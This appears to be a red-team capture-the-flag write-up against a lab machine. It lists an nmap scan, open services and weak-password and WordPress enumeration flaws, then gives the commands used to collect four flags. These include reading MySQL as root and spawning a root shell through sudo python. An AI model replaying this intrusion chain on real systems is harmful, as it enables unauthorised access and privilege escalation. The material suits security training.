Offensive Report
Red Team: Summary of Operations
Table of Contents
- Exposed Services
- Critical Vulnerabilities
- Exploitation
Exposed Services
Nmap scan results for each machine reveal the below services and OS details:
$ nmap ... -sV -oN namp_scan.txt 192.168.1.0/24
This scan identifies the services below as potential points of entry:
- Target 1
- Service Info: Host: TARGET1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Port 22 OpenSSH 6.7p1
- Port 80 HTTP Apache httpd 2.4.10 (Debian)
- Port 111 RPCBind 2-4 (RPC #1000000)
- Port 139 NetBios-SSN Samba smb 3.X - 4.X (workgroup: Workgroup)
- Port 445 NetBios-SSN Samba smb 3.X - 4.X (workgroup: Workgroup)
- Service Info: Host: TARGET1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The following vulnerabilities were identified on each target:
- Target 1
- Word Press Enumartion
- Brute Force
- Weak and Insecure Passwords
Exploitation
The Red Team was able to penetrate Target 1 and retrieve the following confidential data:
- Target 1
flag1{b9bbcb33e11b80be759c4e844862482d}:
cd /var/www/html
grep -r flag
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}:
cd /var/www
cat flag.txt
flag3{afc01ab56b50591e7dccf93122770cd2}:
mysql -u root -p
use wordpress
select * from wp_posts
flag4{715dea6c055b9fe3337544932f2941ce}:
ssh [email protected]
sudo python -c 'import pty;pty.spawn("/bin/bash");'